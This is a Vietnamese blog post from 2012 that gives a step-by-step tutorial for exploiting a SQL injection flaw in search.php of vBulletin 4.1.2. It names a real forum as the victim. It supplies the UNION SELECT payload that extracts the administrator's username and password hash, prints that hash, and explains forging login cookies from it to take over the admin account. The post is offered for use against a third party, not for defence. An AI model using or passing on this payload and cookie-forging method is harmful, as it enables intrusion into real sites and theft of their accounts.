8 thg 7, 2012

[Exploits]vbb 4.1.2(search.php)-Superkhung

[Exploits]vbb 4.1.2(search.php)-Superkhung
ok mình bik đa số người bik về exploits này nhưng mình viết đại cho vui

trước tiên chúng ta cần add-on trong firefox

PHP Code:

Live Http Header



PHP Code:
cookies manager+ 1.5.1


ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2

có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi

2/view page source và chúng ta nhìn vào
PHP Code:
<meta name="generator" content="vBulletin 4.1.2" />

vậy là bik rùi

ok chúng ta bắt đầu cuộc hành trình

1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
This image has been resized.Click to view original image

và mình sẽ chọn group tennis Xì TEEN đễ bug :d

2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN

lưu ý nên bật Live Http Header nhé

ok search nào

3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái

PHP Code:
http://www.tennisvn.net/search.php?do=process

và kiếm từ Content-Length: 272

click bên dưới nó và chọn Replay

và tiếp thêm code vào

PHP Code:
&cat[0]=1) UNION SELECT concat(username,0x3a,0x3a,password) FROM user WHERE userid=1#

This image has been resized.Click to view original image

và click replay và trở lại web victim
chúng ta nhìn vào
Search:

Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234

nay ta có username+password nó rùi nhé

PHP Code:
admin::9a5920bf6c717bb142ceb95566c82234

9a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào

http://md5crack.com/

và bỏ pass đó vào generate MD5 HAsh

nó sẽ ra

PHP Code:
de399e3474d6570b92d46eb00dc5c184

4/ vậy là xong get user+pass của userid=1=admin rùi nhé

tiếp ta log off forum

bật cookie manager ở tools

mình click add

và ghi

Name:bb_userid
content:1
host:tennisvn.net
path:/



tiếp như trên nhé nhưng bên đây có tí thay đổi là

Name:bb_password
content:pass mới generate trên md5crack.com

ok click save giờ restart lại victim

và nó sẽ ra
This image has been resized.Click to view original image

Không có nhận xét nào:

Đăng nhận xét